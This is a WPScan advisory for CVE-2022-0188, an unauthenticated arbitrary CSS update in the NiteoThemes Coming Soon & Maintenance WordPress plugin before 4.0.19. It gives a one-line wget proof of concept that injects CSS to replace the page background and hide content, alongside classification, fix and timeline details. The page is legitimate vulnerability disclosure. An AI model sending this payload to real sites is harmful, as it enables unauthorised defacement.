WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Coming Soon & Maintenance Plugin by NiteoThemes < 4.0.19 - Unauthenticated Arbitrary CSS Update

Description

The plugin allows any user, even not logged in, to arbitrarily change the coming soon page layout.

Proof of Concept

wget 127.0.0.1:8001 --post-data="niteoCS_footer_background_opacity_hardwork=0%29;%7dbody%7Bbackground-image%3Aurl%28data%3A//image/gif%3Bbase64%2CR0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs%3D%29%3B%7Ddiv,section%7Bdisplay%3Anone%20%21important%7D%3B" -q -O-

Affects Plugins

cmp-coming-soon-maintenance
Fixed in version 4.0.19

References

CVE
CVE-2022-0188
URL
https://plugins.trac.wordpress.org/changeset/2657597/cmp-coming-soon-maintenance

Classification

Type

AUTHBYPASS

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
50b6f770-6f53-41ef-b2f3-2a58e9afd332

Timeline

Publicly Published

2022-01-17 (about 4 months ago)

Added

2022-01-17 (about 4 months ago)

Last Updated

2022-04-10 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin